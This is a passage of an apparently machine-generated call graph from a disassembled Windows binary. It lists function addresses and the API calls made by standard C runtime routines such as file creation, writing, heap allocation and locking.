6800->6788 6801 b51c07 6800->6801 6873 b5558a EncodePointer 6801->6873 6898 b55770 6803->6898 6913 b51774 GetModuleHandleExW 6804->6913 6808 b548bf 6807->6808 6810 b544f9 6808->6810 6812 b548d2 6808->6812 6916 b5114d 6808->6916 6810->6751 6810->6752 6812->6808 6812->6810 6933 b543a9 Sleep 6812->6933 6934 b54599 LeaveCriticalSection 6813->6934 6815 b5455e 6815->6753 6817 b53e92 6816->6817 6818 b51cc3 __cftof_l 58 API calls 6817->6818 6819 b53e9c 6817->6819 6820 b53eb8 6818->6820 6819->6767 6823 b51e89 6820->6823 6826 b51e5e DecodePointer 6823->6826 6827 b51e71 6826->6827 6832 b51e99 IsProcessorFeaturePresent 6827->6832 6830 b51e5e __cftof_l 8 API calls 6831 b51e95 6830->6831 6831->6767 6833 b51ea4 6832->6833 6838 b51d2c 6833->6838 6837 b51e88 6837->6830 6839 b51d46 _memset ___raise_securityfailure 6838->6839 6840 b51d66 IsDebuggerPresent 6839->6840 6841 b543cc ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 6840->6841 6843 b51e2a ___raise_securityfailure 6841->6843 6842 b55770 __cftof_l 6 API calls 6844 b51e4d 6842->6844 6843->6842 6845 b543b7 GetCurrentProcess TerminateProcess 6844->6845 6845->6837 6847 b55470 6846->6847 6848 b55462 6846->6848 6849 b51cc3 __cftof_l 58 API calls 6847->6849 6848->6847 6853 b55489 6848->6853 6850 b5547a 6849->6850 6851 b51e89 __cftof_l 9 API calls 6850->6851 6852 b51b46 6851->6852 6852->6788 6852->6789 6853->6852 6854 b51cc3 __cftof_l 58 API calls 6853->6854 6854->6850 6859 b554da 6855->6859 6856 b554de 6857 b554e3 6856->6857 6858 b51cc3 __cftof_l 58 API calls 6856->6858 6857->6794 6860 b5550e 6858->6860 6859->6856 6859->6857 6862 b5551d 6859->6862 6861 b51e89 __cftof_l 9 API calls 6860->6861 6861->6857 6862->6857 6863 b51cc3 __cftof_l 58 API calls 6862->6863 6863->6860 6865 b55405 6864->6865 6868 b553f7 6864->6868 6866 b51cc3 __cftof_l 58 API calls 6865->6866 6867 b5540f 6866->6867 6869 b51e89 __cftof_l 9 API calls 6867->6869 6868->6865 6871 b55431 6868->6871 6870 b51be9 6869->6870 6870->6788 6870->6799 6871->6870 6872 b51cc3 __cftof_l 58 API calls 6871->6872 6872->6867 6874 b555be ___crtIsPackagedApp 6873->6874 6875 b5567d IsDebuggerPresent 6874->6875 6876 b555cd LoadLibraryExW 6874->6876 6877 b55687 6875->6877 6878 b556a2 6875->6878 6879 b555e4 GetLastError 6876->6879 6880 b5560a GetProcAddress 6876->6880 6882 b55695 6877->6882 6883 b5568e OutputDebugStringW 6877->6883 6878->6882 6884 b556a7 DecodePointer 6878->6884 6885 b555f3 LoadLibraryExW 6879->6885 6888 b5569a 6879->6888 6881 b5561e 7 API calls 6880->6881 6880->6888 6886 b55666 GetProcAddress EncodePointer 6881->6886 6887 b5567a 6881->6887 6882->6888 6889 b556e6 6882->6889 6892 b556ce DecodePointer DecodePointer 6882->6892 6883->6882 6884->6888 6885->6880 6885->6888 6886->6887 6887->6875 6890 b55770 __cftof_l 6 API calls 6888->6890 6891 b5571e DecodePointer 6889->6891 6897 b5570a DecodePointer 6889->6897 6894 b5576c 6890->6894 6895 b55725 6891->6895 6891->6897 6892->6889 6894->6803 6896 b55736 DecodePointer 6895->6896 6895->6897 6896->6897 6897->6888 6899 b55778 6898->6899 6900 b5577a IsProcessorFeaturePresent 6898->6900 6899->6778 6902 b57ae6 6900->6902 6905 b57a95 IsDebuggerPresent 6902->6905 6906 b57aaa ___raise_securityfailure 6905->6906 6911 b543cc SetUnhandledExceptionFilter UnhandledExceptionFilter 6906->6911 6908 b57ab2 ___raise_securityfailure 6912 b543b7 GetCurrentProcess TerminateProcess 6908->6912 6910 b57acf 6910->6778 6911->6908 6912->6910 6914 b5179f ExitProcess 6913->6914 6915 b5178d GetProcAddress 6913->6915 6915->6914 6917 b511c8 6916->6917 6929 b51159 6916->6929 6918 b51741 __calloc_impl DecodePointer 6917->6918 6919 b511ce 6918->6919 6920 b51cc3 __cftof_l 57 API calls 6919->6920 6932 b511c0 6920->6932 6921 b51a75 __FF_MSGBANNER 57 API calls 6928 b51164 6921->6928 6922 b5118c RtlAllocateHeap 6922->6929 6922->6932 6923 b51ad2 __NMSG_WRITE 57 API calls 6923->6928 6924 b511b4 6927 b51cc3 __cftof_l 57 API calls 6924->6927 6925 b517a8 _doexit 3 API calls 6925->6928 6926 b51741 __calloc_impl DecodePointer 6926->6929 6930 b511b2 6927->6930 6928->6921 6928->6923 6928->6925 6928->6929 6929->6922 6929->6924 6929->6926 6929->6928 6929->6930 6931 b51cc3 __cftof_l 57 API calls 6930->6931 6931->6932 6932->6808 6933->6812 6934->6815 6935->6737 6936->6740 6940 b54599 LeaveCriticalSection 6937->6940 6939 b53b5a 6939->6570 6940->6939 6942 b54945 EncodePointer 6941->6942 6942->6942 6943 b5495f 6942->6943 6943->6609 6947 b54720 6944->6947 6946 b54827 6946->6611 6948 b5472c __freefls@4 6947->6948 6955 b51920 6948->6955 6954 b54753 __freefls@4 6954->6946 6956 b5442f __lock 58 API calls 6955->6956 6957 b51927 6956->6957 6958 b54764 DecodePointer DecodePointer 6957->6958 6959 b54791 6958->6959 6960 b54741 6958->6960 6959->6960 6972 b57421 6959->6972 6969 b5475e 6960->6969 6962 b547f4 EncodePointer EncodePointer 6962->6960 6963 b547a3 6963->6962 6964 b547c8 6963->6964 6979 b548f8 6963->6979 6964->6960 6966 b548f8 __realloc_crt 61 API calls 6964->6966 6967 b547e2 EncodePointer 6964->6967 6968 b547dc 6966->6968 6967->6962 6968->6960 6968->6967 7006 b51929 6969->7006 6973 b5743f HeapSize 6972->6973 6974 b5742a 6972->6974 6973->6963 6975 b51cc3 __cftof_l 58 API calls 6974->6975 6976 b5742f 6975->6976 6977 b51e89 __cftof_l 9 API calls 6976->6977 6978 b5743a 6977->6978 6978->6963 6981 b548ff 6979->6981 6982 b5493c 6981->6982 6984 b57452 6981->6984 7005 b543a9 Sleep 6981->7005 6982->6964 6985 b57466 6984->6985 6986 b5745b 6984->6986 6988 b5746e 6985->6988 6997 b5747b 6985->6997 6987 b5114d _malloc 58 API calls 6986->6987 6989 b57463 6987->6989 6990 b54831 _free 58 API calls 6988->6990 6989->6981 7004 b57476 _free 6990->7004 6991 b574b3 6992 b51741 __calloc_impl DecodePointer 6991->6992 6994 b574b9 6992->6994 6993 b57483 HeapReAlloc 6993->6997 6993->7004 6995 b51cc3 __cftof_l 58 API calls 6994->6995 6995->7004 6996 b574e3 6999 b51cc3 __cftof_l 58 API calls 6996->6999 6997->6991 6997->6993 6997->6996 6998 b51741 __calloc_impl DecodePointer 6997->6998 7001 b574cb 6997->7001 6998->6997 7000 b574e8 GetLastError 6999->7000 7000->7004 7002 b51cc3 __cftof_l 58 API calls 7001->7002 7003 b574d0 GetLastError 7002->7003 7003->7004 7004->6981 7005->6981 7009 b54599 LeaveCriticalSection 7006->7009 7008 b51930 7008->6954 7009->7008 7016 b511f4 7010->7016 7012 b51025 VirtualAlloc 7013 b51483 7012->7013 7532 b5149e 7013->7532 7015 b51499 7015->6619 7018 b51200 __freefls@4 7016->7018 7017 b51213 7019 b51cc3 __cftof_l 58 API calls 7017->7019 7018->7017 7021 b51244 7018->7021 7020 b51218 7019->7020 7022 b51e89 __cftof_l 9 API calls 7020->7022 7035 b52034 7021->7035 7031 b51223 @_EH4_CallFilterFunc@8 __freefls@4 7022->7031 7024 b51249 7025 b51252 7024->7025 7026 b5125f 7024->7026 7027 b51cc3 __cftof_l 58 API calls 7025->7027 7028 b51289 7026->7028 7029 b51269 7026->7029 7027->7031 7050 b52153 7028->7050 7032 b51cc3 __cftof_l 58 API calls 7029->7032 7031->7012 7032->7031 7036 b52040 __freefls@4 7035->7036 7037 b5442f __lock 58 API calls 7036->7037 7044 b5204e 7037->7044 7038 b520c2 7068 b5214a 7038->7068 7039 b520c9 7041 b548b1 __malloc_crt 58 API calls 7039->7041 7043 b520d0 7041->7043 7042 b5213f __freefls@4 7042->7024 7043->7038 7046 b540a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 7043->7046 7044->7038 7044->7039 7047 b544b7 __mtinitlocknum 58 API calls 7044->7047 7071 b51f9d 7044->7071 7076 b52007 7044->7076 7048 b520f6 EnterCriticalSection 7046->7048 7047->7044 7048->7038 7051 b52173 __wopenfile 7050->7051 7052 b5218d 7051->7052 7064 b52348 7051->7064 7086 b562b3 7051->7086 7053 b51cc3 __cftof_l 58 API calls 7052->7053 7054 b52192 7053->7054 7055 b51e89 __cftof_l 9 API calls 7054->7055 7058 b51294 7055->7058 7056 b523ab 7083 b5625f 7056->7083 7065 b512b6 7058->7065 7061 b562b3 __wcsnicmp 60 API calls 7062 b52360 7061->7062 7063 b562b3 __wcsnicmp 60 API calls 7062->7063 7062->7064 7063->7064 7064->7052 7064->7056 7525 b51fcd 7065->7525 7067 b512bc 7067->7031 7081 b54599 LeaveCriticalSection 7068->7081 7070 b52151 7070->7042 7072 b51fbe EnterCriticalSection 7071->7072 7073 b51fa8 7071->7073 7072->7044 7074 b5442f __lock 58 API calls 7073->7074 7075 b51fb1 7074->7075 7075->7044 7077 b52015 7076->7077 7078 b52028 LeaveCriticalSection 7076->7078 7082 b54599 LeaveCriticalSection 7077->7082 7078->7044 7080 b52025 7080->7044 7081->7070 7082->7080 7094 b55a43 7083->7094 7085 b56278 7085->7058 7087 b562c5 7086->7087 7088 b56351 7086->7088 7090 b52341 7087->7090 7091 b51cc3 __cftof_l 58 API calls 7087->7091 7437 b56369 7088->7437 7090->7061 7090->7064 7092 b562de 7091->7092 7093 b51e89 __cftof_l 9 API calls 7092->7093 7093->7090 7097 b55a4f __freefls@4 7094->7097 7095 b55a65 7096 b51cc3 __cftof_l 58 API calls 7095->7096 7098 b55a6a 7096->7098 7097->7095 7099 b55a9b 7097->7099 7100 b51e89 __cftof_l 9 API calls 7098->7100 7105 b55b0c 7099->7105 7104 b55a74 __freefls@4 7100->7104 7102 b55ab7 7179 b55ae0 7102->7179 7104->7085 7106 b55b2c 7105->7106 7183 b58a18 7106->7183 7108 b55c7f 7109 b51e99 __invoke_watson 8 API calls 7108->7109 7110 b5625e 7109->7110 7113 b55a43 __wsopen_helper 103 API calls 7110->7113 7111 b55b48 7111->7108 7112 b55b82 7111->7112 7119 b55ba5 7111->7119 7214 b51c8f 7112->7214 7115 b56278 7113->7115 7115->7102 7117 b51cc3 __cftof_l 58 API calls 7118 b55b94 7117->7118 7121 b51e89 __cftof_l 9 API calls 7118->7121 7120 b55c63 7119->7120 7127 b55c41 7119->7127 7122 b51c8f __chsize_nolock 58 API calls 7120->7122 7123 b55b9e 7121->7123 7124 b55c68 7122->7124 7123->7102 7125 b51cc3 __cftof_l 58 API calls 7124->7125 7126 b55c75 7125->7126 7128 b51e89 __cftof_l 9 API calls 7126->7128 7190 b56d16 7127->7190 7128->7108 7130 b55d0f 7131 b55d3c 7130->7131 7132 b55d19 7130->7132 7208 b559bb 7131->7208 7134 b51c8f __chsize_nolock 58 API calls 7132->7134 7135 b55d1e 7134->7135 7137 b51cc3 __cftof_l 58 API calls 7135->7137 7136 b55ddc GetFileType 7140 b55de7 GetLastError 7136->7140 7141 b55e29 7136->7141 7139 b55d28 7137->7139 7138 b55daa GetLastError 7217 b51ca2 7138->7217 7145 b51cc3 __cftof_l 58 API calls 7139->7145 7142 b51ca2 __dosmaperr 58 API calls 7140->7142 7222 b56fac 7141->7222 7146 b55e0e CloseHandle 7142->7146 7145->7123 7148 b55dcf 7146->7148 7149 b55e1c 7146->7149 7147 b559bb ___createFile 3 API calls 7150 b55d9f 7147->7150 7153 b51cc3 __cftof_l 58 API calls 7148->7153 7152 b51cc3 __cftof_l 58 API calls 7149->7152 7150->7136 7150->7138 7154 b55e21 7152->7154 7153->7108 7154->7148 7156 b56002 7156->7108 7159 b561d5 CloseHandle 7156->7159 7160 b559bb ___createFile 3 API calls 7159->7160 7161 b561fc 7160->7161 7163 b56204 GetLastError 7161->7163 7178 b5608c 7161->7178 7162 b51c8f __chsize_nolock 58 API calls 7174 b55ec8 7162->7174 7164 b51ca2 __dosmaperr 58 API calls 7163->7164 7165 b56210 7164->7165 7314 b56ebf 7165->7314 7167 b52a2a 70 API calls __read_nolock 7167->7174 7168 b55ed0 7168->7174 7240 b5897e 7168->7240 7255 b586ed 7168->7255 7172 b5607f 7175 b5897e __close_nolock 61 API calls 7172->7175 7173 b57054 60 API calls __lseeki64_nolock 7173->7174 7174->7156 7174->7167 7174->7168 7174->7172 7174->7173 7286 b57d99 7174->7286 7176 b56086 7175->7176 7177 b51cc3 __cftof_l 58 API calls 7176->7177 7177->7178 7178->7108 7180 b55ae6 7179->7180 7181 b55b0a 7179->7181 7436 b5702e LeaveCriticalSection 7180->7436 7181->7104 7184 b58a37 7183->7184 7185 b58a22 7183->7185 7184->7111 7186 b51cc3 __cftof_l 58 API calls 7185->7186 7187 b58a27 7186->7187 7188 b51e89 __cftof_l 9 API calls 7187->7188 7189 b58a32 7188->7189 7189->7111 7191 b56d22 __freefls@4 7190->7191 7192 b544b7 __mtinitlocknum 58 API calls 7191->7192 7193 b56d33 7192->7193 7194 b5442f __lock 58 API calls 7193->7194 7195 b56d38 __freefls@4 7193->7195 7199 b56d46 7194->7199 7195->7130 7197 b56e26 7198 b54869 __calloc_crt 58 API calls 7197->7198 7200 b56e2f 7198->7200 7199->7197 7201 b56dc6 EnterCriticalSection 7199->7201 7202 b5442f __lock 58 API calls 7199->7202 7205 b540a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 7199->7205 7207 b56e94 7199->7207 7323 b56dee 7199->7323 7200->7207 7326 b56c88 7200->7326 7201->7199 7203 b56dd6 LeaveCriticalSection 7201->7203 7202->7199 7203->7199 7205->7199 7335 b56eb6 7207->7335 7209 b559c6 ___crtIsPackagedApp 7208->7209 7210 b55a21 CreateFileW 7209->7210 7211 b559ca GetModuleHandleW GetProcAddress 7209->7211 7212 b55a3f 7210->7212 7213 b559e7 7211->7213 7212->7136 7212->7138 7212->7147 7213->7212 7215 b536f3 __getptd_noexit 58 API calls 7214->7215 7216 b51c94 7215->7216 7216->7117 7218 b51c8f __chsize_nolock 58 API calls 7217->7218 7219 b51cab _free 7218->7219 7220 b51cc3 __cftof_l 58 API calls 7219->7220 7221 b51cbe 7220->7221 7221->7148 7223 b57014 7222->7223 7224 b56fb8 7222->7224 7225 b51cc3 __cftof_l 58 API calls 7223->7225 7224->7223 7229 b56fda 7224->7229 7226 b57019 7225->7226 7228 b51c8f __chsize_nolock 58 API calls 7226->7228 7227 b55e47 7227->7156 7227->7174 7231 b57054 7227->7231 7228->7227 7229->7227 7230 b56fff SetStdHandle 7229->7230 7230->7227 7343 b56f45 7231->7343 7233 b57064 7234 b5707d SetFilePointerEx 7233->7234 7235 b5706c 7233->7235 7237 b57095 GetLastError 7234->7237 7239 b55eb1 7234->7239 7236 b51cc3 __cftof_l 58 API calls 7235->7236 7236->7239 7238 b51ca2 __dosmaperr 58 API calls 7237->7238 7238->7239 7239->7162 7239->7174 7241 b56f45 __chsize_nolock 58 API calls 7240->7241 7243 b5898c 7241->7243 7242 b589e2 7244 b56ebf __free_osfhnd 59 API calls 7242->7244 7243->7242 7246 b56f45 __chsize_nolock 58 API calls 7243->7246 7254 b589c0 7243->7254 7245 b589ea 7244->7245 7250 b51ca2 __dosmaperr 58 API calls 7245->7250 7251 b58a0c 7245->7251 7248 b589b7 7246->7248 7247 b56f45 __chsize_nolock 58 API calls 7249 b589cc CloseHandle 7247->7249 7252 b56f45 __chsize_nolock 58 API calls 7248->7252 7249->7242 7253 b589d8 GetLastError 7249->7253 7250->7251 7251->7168 7252->7254 7253->7242 7254->7242 7254->7247 7256 b57054 __lseeki64_nolock 60 API calls 7255->7256 7257 b5870a 7256->7257 7258 b5876f 7257->7258 7259 b57054 __lseeki64_nolock 60 API calls 7257->7259 7260 b51cc3 __cftof_l 58 API calls 7258->7260 7261 b5877a 7258->7261 7263 b58726 7259->7263 7260->7261 7261->7168 7262 b5880e 7268 b57054 __lseeki64_nolock 60 API calls 7262->7268 7282 b58874 7262->7282 7263->7258 7263->7262 7264 b5874f GetProcessHeap HeapAlloc 7263->7264 7265 b5876a 7264->7265 7270 b58783 __setmode_nolock 7264->7270 7267 b51cc3 __cftof_l 58 API calls 7265->7267 7266 b57054 __lseeki64_nolock 60 API calls 7266->7258 7267->7258 7269 b58826 7268->7269 7269->7258 7271 b56f45 __chsize_nolock 58 API calls 7269->7271 7277 b587d4 7270->7277 7285 b587e3 __setmode_nolock 7270->7285 7356 b57e88 7270->7356 7272 b5883a SetEndOfFile 7271->7272 7273 b5885a 7272->7273 7272->7282 7275 b51cc3 __cftof_l 58 API calls 7273->7275 7276 b5885f 7275->7276 7278 b51c8f __chsize_nolock 58 API calls 7276->7278 7279 b51c8f __chsize_nolock 58 API calls 7277->7279 7280 b5886a GetLastError 7278->7280 7281 b587d9 7279->7281 7280->7282 7284 b51cc3 __cftof_l 58 API calls 7281->7284 7281->7285 7282->7258 7282->7266 7283 b587f8 GetProcessHeap HeapFree 7283->7282 7284->7285 7285->7283 7287 b57da5 __freefls@4 7286->7287 7288 b57db2 7287->7288 7289 b57dc9 7287->7289 7290 b51c8f __chsize_nolock 58 API calls 7288->7290 7291 b57e68 7289->7291 7292 b57ddd 7289->7292 7294 b57db7 7290->7294 7293 b51c8f __chsize_nolock 58 API calls 7291->7293 7295 b57e05 7292->7295 7296 b57dfb 7292->7296 7297 b57e00 7293->7297 7298 b51cc3 __cftof_l 58 API calls 7294->7298 7300 b56c88 ___lock_fhandle 59 API calls 7295->7300 7299 b51c8f __chsize_nolock 58 API calls 7296->7299 7302 b51cc3 __cftof_l 58 API calls 7297->7302 7306 b57dbe __freefls@4 7298->7306 7299->7297 7301 b57e0b 7300->7301 7303 b57e31 7301->7303 7304 b57e1e 7301->7304 7305 b57e74 7302->7305 7309 b51cc3 __cftof_l 58 API calls 7303->7309 7307 b57e88 __write_nolock 76 API calls 7304->7307 7308 b51e89 __cftof_l 9 API calls 7305->7308 7306->7174 7310 b57e2a 7307->7310 7308->7306 7311 b57e36 7309->7311 7432 b57e60 7310->7432 7312 b51c8f __chsize_nolock 58 API calls 7311->7312 7312->7310 7315 b56f2b 7314->7315 7316 b56ecb 7314->7316 7317 b51cc3 __cftof_l 58 API calls 7315->7317 7316->7315 7321 b56ef4 7316->7321 7318 b56f30 7317->7318 7319 b51c8f __chsize_nolock 58 API calls 7318->7319 7320 b56f1c 7319->7320 7320->7178 7321->7320 7322 b56f16 SetStdHandle 7321->7322 7322->7320 7338 b54599 LeaveCriticalSection 7323->7338 7325 b56df5 7325->7199 7327 b56c94 __freefls@4 7326->7327 7328 b56ce3 EnterCriticalSection 7327->7328 7329 b5442f __lock 58 API calls 7327->7329 7330 b56d09 __freefls@4 7328->7330 7331 b56cb9 7329->7331 7330->7207 7332 b56cd1 7331->7332 7334 b540a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 7331->7334 7339 b56d0d 7332->7339 7334->7332 7342 b54599 LeaveCriticalSection 7335->7342 7337 b56ebd 7337->7195 7338->7325 7340 b54599 _doexit LeaveCriticalSection 7339->7340 7341 b56d14 7340->7341 7341->7328 7342->7337 7344 b56f50 7343->7344 7347 b56f65 7343->7347 7345 b51c8f __chsize_nolock 58 API calls 7344->7345 7346 b56f55 7345->7346 7349 b51cc3 __cftof_l 58 API calls 7346->7349 7348 b51c8f __chsize_nolock 58 API calls 7347->7348 7350 b56f8a 7347->7350 7351 b56f94 7348->7351 7352 b56f5d 7349->7352 7350->7233 7353 b51cc3 __cftof_l 58 API calls 7351->7353 7352->7233 7354 b56f9c 7353->7354 7355 b51e89 __cftof_l 9 API calls 7354->7355 7355->7352 7357 b57e95 __write_nolock 7356->7357 7358 b57ed4 7357->7358 7359 b57ef3 7357->7359 7389 b57ec9 7357->7389 7361 b51c8f __chsize_nolock 58 API calls 7358->7361 7362 b57f4b 7359->7362 7363 b57f2f 7359->7363 7360 b55770 __cftof_l 6 API calls 7364 b586e9 7360->7364 7365 b57ed9 7361->7365 7367 b57f64 7362->7367 7371 b57054 __lseeki64_nolock 60 API calls 7362->7371 7366 b51c8f __chsize_nolock 58 API calls 7363->7366 7364->7270 7368 b51cc3 __cftof_l 58 API calls 7365->7368 7370 b57f34 7366->7370 7415 b56c34 7367->7415 7372 b57ee0 7368->7372 7375 b51cc3 __cftof_l 58 API calls 7370->7375 7371->7367 7373 b51e89 __cftof_l 9 API calls 7372->7373 7373->7389 7374 b57f72 7376 b582cb 7374->7376 7424 b536db 7374->7424 7377 b57f3b 7375->7377 7378 b5865e WriteFile 7376->7378 7379 b582e9 7376->7379 7380 b51e89 __cftof_l 9 API calls 7377->7380 7382 b582be GetLastError 7378->7382 7388 b5828b 7378->7388 7383 b5840d 7379->7383 7392 b582ff 7379->7392 7380->7389 7382->7388 7395 b58418 7383->7395 7407 b58502 7383->7407 7385 b58697 7387 b51cc3 __cftof_l 58 API calls 7385->7387 7385->7389 7386 b57fdd 7386->7376 7390 b57fed GetConsoleCP 7386->7390 7393 b586c5 7387->7393 7388->7385 7388->7389 7394 b583eb 7388->7394 7389->7360 7390->7385 7413 b5801c 7390->7413 7391 b5836e WriteFile 7391->7382 7391->7392 7392->7385 7392->7388 7392->7391 7397 b51c8f __chsize_nolock 58 API calls 7393->7397 7398 b583f6 7394->7398 7399 b5868e 7394->7399 7395->7385 7395->7388 7396 b5847d WriteFile 7395->7396 7396->7382 7396->7395 7397->7389 7401 b51cc3 __cftof_l 58 API calls 7398->7401 7402 b51ca2 __dosmaperr 58 API calls 7399->7402 7400 b58577 WideCharToMultiByte 7400->7382 7400->7407 7404 b583fb 7401->7404 7402->7389 7403 b585c6 WriteFile 7406 b58619 GetLastError 7403->7406 7403->7407 7408 b51c8f __chsize_nolock 58 API calls 7404->7408 7406->7407 7407->7385 7407->7388 7407->7400 7407->7403 7408->7389 7409 b592d3 WriteConsoleW CreateFileW __putwch_nolock 7409->7413 7410 b592bb 60 API calls __write_nolock 7410->7413 7411 b58105 WideCharToMultiByte 7411->7388 7412 b58140 WriteFile 7411->7412 7412->7382 7412->7413 7413->7382 7413->7388 7413->7409 7413->7410 7413->7411 7414 b5819a WriteFile 7413->7414 7429 b591b5 7413->7429 7414->7382 7414->7413 7416 b56c4c 7415->7416 7417 b56c3f 7415->7417 7420 b56c58 7416->7420 7421 b51cc3 __cftof_l 58 API calls 7416->7421 7418 b51cc3 __cftof_l 58 API calls 7417->7418 7419 b56c44 7418->7419 7419->7374 7420->7374 7422 b56c79 7421->7422 7423 b51e89 __cftof_l 9 API calls 7422->7423 7423->7419 7425 b536f3 __getptd_noexit 58 API calls 7424->7425 7426 b536e1 7425->7426 7427 b536ee GetConsoleMode 7426->7427 7428 b517be __lock 58 API calls 7426->7428 7427->7376 7427->7386 7428->7427 7430 b5917b __isleadbyte_l 58 API calls 7429->7430 7431 b591c2 7430->7431 7431->7413 7435 b5702e LeaveCriticalSection 7432->7435 7434 b57e66 7434->7306 7435->7434 7436->7181 7438 b5637d 7437->7438 7447 b56394 7437->7447 7439 b56384 7438->7439 7440 b563a5 7438->7440 7441 b51cc3 __cftof_l 58 API calls 7439->7441 7448 b54bfc 7440->7448 7443 b56389 7441->7443 7444 b51e89 __cftof_l 9 API calls 7443->7444 7444->7447 7445 b563b0 7446 b58b0f 60 API calls __towlower_l 7445->7446 7445->7447 7446->7445 7447->7090 7449 b54c5a 7448->7449 7450 b54c0d 7448->7450 7449->7445 7451 b536db __write_nolock 58 API calls 7450->7451 7452 b54c13 7451->7452 7454 b54c3a 7452->7454 7456 b57356 7452->7456 7454->7449 7471 b54f1d 7454->7471 7457 b57362 __freefls@4 7456->7457 7458 b536db __write_nolock 58 API calls 7457->7458 7459 b5736b 7458->7459 7460 b5739a 7459->7460 7461 b5737e 7459->7461 7462 b5442f __lock 58 API calls 7460->7462 7463 b536db __write_nolock 58 API calls 7461->7463 7464 b573a1 7462->7464 7465 b57383 7463->7465 7483 b573d6 7464->7483 7469 b57391 __freefls@4 7465->7469 7470 b517be __lock 58 API calls 7465->7470 7469->7454 7470->7469 7472 b54f29 __freefls@4 7471->7472 7473 b536db __write_nolock 58 API calls 7472->7473 7474 b54f33 7473->7474 7475 b5442f __lock 58 API calls 7474->7475 7480 b54f45 7474->7480 7476 b54f63 7475->7476 7481 b54831 _free 58 API calls 7476->7481 7482 b54f90 7476->7482 7477 b517be __lock 58 API calls 7479 b54f53 __freefls@4 7477->7479 7479->7449 7480->7477 7480->7479 7481->7482 7521 b54fba 7482->7521 7484 b573e1 ___addlocaleref ___removelocaleref 7483->7484 7486 b573b5 7483->7486 7484->7486 7490 b5715c 7484->7490 7487 b573cd 7486->7487 7520 b54599 LeaveCriticalSection 7487->7520 7489 b573d4 7489->7465 7491 b571d5 7490->7491 7493 b57171 7490->7493 7492 b57222 7491->7492 7494 b54831 _free 58 API calls 7491->7494 7496 b58d75 ___free_lc_time 58 API calls 7492->7496 7505 b5724b 7492->7505 7493->7491 7495 b571a2 7493->7495 7502 b54831 _free 58 API calls 7493->7502 7497 b571f6 7494->7497 7499 b571c0 7495->7499 7510 b54831 _free 58 API calls 7495->7510 7498 b57240 7496->7498 7500 b54831 _free 58 API calls 7497->7500 7503 b54831 _free 58 API calls 7498->7503 7501 b54831 _free 58 API calls 7499->7501 7506 b57209 7500->7506 7507 b571ca 7501->7507 7508 b57197 7502->7508 7503->7505 7504 b572aa 7509 b54831 _free 58 API calls 7504->7509 7505->7504 7513 b54831 58 API calls _free 7505->7513 7511 b54831 _free 58 API calls 7506->7511 7512 b54831 _free 58 API calls 7507->7512 7514 b58c12 ___free_lconv_mon 58 API calls 7508->7514 7515 b572b0 7509->7515 7516 b571b5 7510->7516 7517 b57217 7511->7517 7512->7491 7513->7505 7514->7495 7515->7486 7518 b58d0e ___free_lconv_num 58 API calls 7516->7518 7519 b54831 _free 58 API calls 7517->7519 7518->7499 7519->7492 7520->7489 7524 b54599 LeaveCriticalSection 7521->7524 7523 b54fc1 7523->7480 7524->7523 7526 b51fdc 7525->7526 7527 b51ffb LeaveCriticalSection 7525->7527 7526->7527 7528 b51fe3 7526->7528 7527->7067 7531 b54599 LeaveCriticalSection 7528->7531 7530 b51ff8 7530->7067 7531->7530 7533 b514aa __freefls@4 7532->7533 7534 b514c0 _memset 7533->7534 7535 b514ed 7533->7535 7536 b514e5 __freefls@4 7533->7536 7538 b51cc3 __cftof_l 58 API calls 7534->7538 7545 b51f5e 7535->7545 7536->7015 7541 b514da 7538->7541 7543 b51e89 __cftof_l 9 API calls 7541->7543 7543->7536 7546 b51f90 EnterCriticalSection 7545->7546 7547 b51f6e 7545->7547 7550 b514f3 7546->7550 7547->7546 7548 b51f76 7547->7548 7549 b5442f __lock 58 API calls 7548->7549 7549->7550 7551 b512be 7550->7551 7555 b512d9 _memset 7551->7555 7558 b512f4 7551->7558 7552 b512e4 7553 b51cc3 __cftof_l 58 API calls 7552->7553 7554 b512e9 7553->7554 7556 b51e89 __cftof_l 9 API calls 7554->7556 7555->7552 7555->7558 7562 b51334 7555->7562 7556->7558 7565 b51527 7558->7565 7559 b51445 _memset 7563 b51cc3 __cftof_l 58 API calls 7559->7563 7562->7558 7562->7559 7568 b52873 7562->7568 7575 b52a2a 7562->7575 7643 b52752 7562->7643 7663 b52897 7562->7663 7563->7554 7566 b51fcd __wfsopen 2 API calls 7565->7566 7567 b5152d 7566->7567 7567->7536 7569 b52892 7568->7569 7570 b5287d 7568->7570 7569->7562 7571 b51cc3 __cftof_l 58 API calls 7570->7571 7572 b52882 7571->7572 7573 b51e89 __cftof_l 9 API calls 7572->7573 7574 b5288d 7573->7574 7574->7562 7576 b52a62 7575->7576 7577 b52a4b 7575->7577 7578 b5319a 7576->7578 7583 b52a9c 7576->7583 7579 b51c8f __chsize_nolock 58 API calls 7577->7579 7580 b51c8f __chsize_nolock 58 API calls 7578->7580 7581 b52a50 7579->7581 7584 b5319f 7580->7584 7582 b51cc3 __cftof_l 58 API calls 7581->7582 7623 b52a57 7582->7623 7585 b52aa4 7583->7585 7592 b52abb 7583->7592 7586 b51cc3 __cftof_l 58 API calls 7584->7586 7587 b51c8f __chsize_nolock 58 API calls 7585->7587 7588 b52ab0 7586->7588 7589 b52aa9 7587->7589 7590 b51e89 __cftof_l 9 API calls 7588->7590 7595 b51cc3 __cftof_l 58 API calls 7589->7595 7590->7623 7591 b52ad0 7593 b51c8f __chsize_nolock 58 API calls 7591->7593 7592->7591 7594 b52aea 7592->7594 7596 b52b08 7592->7596 7592->7623 7593->7589 7594->7591 7599 b52af5 7594->7599 7595->7588 7597 b548b1 __malloc_crt 58 API calls 7596->7597 7600 b52b18 7597->7600 7598 b56c34 __write_nolock 58 API calls 7601 b52c09 7598->7601 7599->7598 7602 b52b20 7600->7602 7603 b52b3b 7600->7603 7604 b52c82 ReadFile 7601->7604 7607 b52c1f GetConsoleMode 7601->7607 7606 b51cc3 __cftof_l 58 API calls 7602->7606 7605 b57054 __lseeki64_nolock 60 API calls 7603->7605 7608 b52ca4 7604->7608 7609 b53162 GetLastError 7604->7609 7605->7599 7610 b52b25 7606->7610 7614 b52c33 7607->7614 7615 b52c7f 7607->7615 7608->7609 7616 b52c74 7608->7616 7611 b52c62 7609->7611 7612 b5316f 7609->7612 7613 b51c8f __chsize_nolock 58 API calls 7610->7613 7621 b51ca2 __dosmaperr 58 API calls 7611->7621 7628 b52c68 7611->7628 7617 b51cc3 __cftof_l 58 API calls 7612->7617 7613->7623 7614->7615 